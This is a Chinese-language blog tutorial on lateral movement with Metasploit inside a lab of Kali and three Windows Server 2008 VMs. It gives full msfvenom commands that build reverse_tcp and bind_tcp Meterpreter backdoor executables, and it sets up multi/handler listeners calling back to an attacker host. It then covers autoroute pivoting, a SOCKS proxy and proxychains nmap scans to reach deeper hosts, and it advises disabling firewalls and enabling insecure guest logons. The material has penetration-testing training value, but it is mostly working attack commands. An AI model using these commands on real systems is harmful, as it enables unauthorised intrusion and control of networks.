当前位置:   article > 正文

内网渗透——Metasploit的代理转发_msf设置代理

msf设置代理

目录

一、环境搭建

1.1 网络配置

1.2 开启文件共享功能

 二、MSF配置代理转发

        2.1 实现主机1上线

        2.2 实现主机2上线

        2.3 实现主机3上线 

一、环境搭建

1.1 网络配置

准备kali linux虚拟机*1

IP设置

 

vim /etc/network/interfaces


准备windows2008 R2虚拟机*3

主机1:

其他主机同理。

本次虚拟机环境没有防火墙限制,所以要提前关闭虚拟机的防火墙

1.2 开启文件共享功能

1)创建共享目录

mkdir /home/share

2) kali中开启文件共享需要下载samba

apt install samba

 3)修改samba配置文件

  1. vi /etc/samba/smb.conf
  2. 文件末尾添加如下内容
  3. [share] #任意名字
  4. comment = lv share #任意名字
  5. path = /home/share # 共享目录
  6. ;read only = no # 将共享目录设置为只读【前面加了;,表示这行被注释掉了】
  7. writable = yes # 将共享目录设置为读写
  8. browseable = yes # 显示共享目录下的所有文件
  9. public = yes # 将共享目录设置为公共的
  10. create mask = 0644 # 设置共享目录中的一般文件的默认权限
  11. directory mask = 0755 # 设置共享目录中的目录文件的默认权限

4)启动samba

  1. systemctl enable smb
  2. systemctl enable nmb
  3. systemctl restart smb
  4. systemctl restart nmb

 5)查看是否启动成功【active(running)代表启动成功】

  1. systemctl status smb
  2. systemctl status nmb

注 :windows10/11 如果不是专业版企业版可能无法访问共享目录

注:win10/11有可能没有打开服务,导致无法访问共享

1)启动组策略

win+r运行输入以下内容

gpedit.msc

2)启用来宾登录

计算机配置==》管理模块==》网络==》Lanman工作站==》启用不安全的来宾登录

 二、MSF配置代理转发

        2.1 实现主机1上线

1)生成后门文件

reverse_tcp:反向链接时使用

lhost:kali 主机ip

  1. msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.100.108 lport=1111 -f exe >
  2. /home/share/1111.exe

2)生成监听器

  1. msfconsole
  2. use exploit/multi/handler
  3. set payload windows/meterpreter/reverse_tcp
  4. set lhost 0.0.0.0
  5. set lport 1111
  6. run

3)被攻击主机1运行生成的1111.exe文件

出现meterpreter就证明成功了,可以执行命令验证

ipconfig

 

 这样我们就实现了第一个主机上线的过程了。

        2.2 实现主机2上线

1)实现主机1上线

2)在已经上线的主机1上创建代理转发功能

        a).查看路由

run autoroute -p

显示 No routes have been added yet 说明没有路由

         b).添加路由

run post/multi/manage/autoroute

 出现这样的页面就说明添加路由成功了

3)挂起当前会话 

background

4)开启代理功能

  1. use auxiliary/server/socks_proxy
  2. set srvhost 0.0.0.0
  3. set srvport 1122
  4. run

5)测试代理功能是否可以工作

kali安装proxychains4

apt install proxychains4

修改配置文件

vim /etc/proxychains4.conf

修改之前设置好的端口1122

 6)在主机2上安装IIS

 7)使用proxychains4测试访问主机2上的IIS

proxychains4 nmap -Pn -sT -p80 10.10.10.2

STATE:open   说明可以访问IIS

 8)生成exe文件后门

bind_tcp:正向链接时使用

lhost: 0.0.0.0 指定主机2本机地址

  1. msfvenom -p windows/meterpreter/bind_tcp lhost=0.0.0.0 lport=2222 -f exe >
  2. /home/share/2222.exe

 9)生成监控器

  1. background #挂起会话
  2. use exploit/multi/handler
  3. set payload windows/meterpreter/bind_tcp
  4. set rhost 10.10.10.2
  5. set lport 2222
  6. run

10)主机2运行2222.exe

        2.3 实现主机3上线 

1)实现主机1、2上线

2)生成后门

  1. msfvenom -p windows/meterpreter/bind_tcp lhost=0.0.0.0 lport=3333 -f exe >
  2. /home/share/3333.exe

3)在主机2会话中创建路由

run post/multi/manage/autoroute

4)挂起会话

background

5)主机3正向链接

  1. use exploit/multi/handler
  2. set payload windows/meterpreter/bind_tcp
  3. set rhost 20.20.20.2
  4. set lport 3333
  5. run

 这样我们就实现了三台主机上线了。

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/酷酷是懒虫/article/detail/912710
推荐阅读
相关标签
  

闽ICP备14008679号